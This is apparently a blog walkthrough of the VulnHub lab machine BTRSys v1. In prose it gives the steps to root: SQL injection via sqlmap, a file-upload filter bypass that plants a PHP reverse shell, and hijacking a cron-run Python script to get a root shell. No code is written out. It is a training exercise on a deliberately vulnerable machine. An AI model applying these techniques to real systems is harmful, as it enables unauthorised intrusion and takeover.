BTRSys: v1

[ vulnhub  boot2root  walkthrough  ]

Goal

uid=0(root) gid=0(root) groups=0(root)

Download

https://www.vulnhub.com/entry/btrsys-v1,195/

Walkthrough

Initial nmap reveals open ports on 21, 22, and 80
alt text

ftp is a ruse
alt text

Looking at the web page nothing is found on first inspection
alt text

nikto reveals a login.php page
alt text

Standard login page
alt text

Looking at the source it shows that it posts to personel.php and has some rules
alt text

Testing first rule shows they’re working
alt text

Looking at the personel.php page, there’s a mysql error
alt text

We know from the rules we need to post something with btrisk.com so we do and intercept using burp
alt text

From there we throw it at sqlmap and we have a vulnerable parameter ‘kullanici_adi’ (username in turkish)
alt text

We dump the database and we get usernames and passwords
alt text

We then login using this information and we find a place to upload files
alt text

Looking at the source we can only upload .jpg or .png files
alt text

Let’s test adding .jpg extension to a .php file
alt text

Success!
alt text

Completely guessed that the upload folder is uploads…it is :)
alt text

Now to get a php file with a reverse shell uploaded, so we interrupt using burp…
alt text

and strip the .jpg extension
alt text

Success!
alt text

After prepping netcat, we browse to our uploaded php file…and we have a shell
alt text

Looking the home folder there is only a user named troll, which doesn’t match anything in /etc/passwd
alt text

We start enumerating and find an interesting log file called cronlog
alt text

Turns out it’s a cron job that runs every 2 minutes calling a python script, which removes all files from the tmp folder
alt text

Wasn’t even about to attempt to edit this using the shell we have so we copy to the uploads folder in order to download and edit properly
alt text
alt text

We edit the script to do a reverse shell back to our machine over a different port
alt text

Now to get this back on the victim machine. First we delete the old script from the uploads folder and use the same trick to upload we did for the initial php file
alt text

After that we copy over to the original script
alt text

We then setup netcat and wait for the cron job to run…and BOOM, we have root
alt text

Written on October 29, 2017
Share on: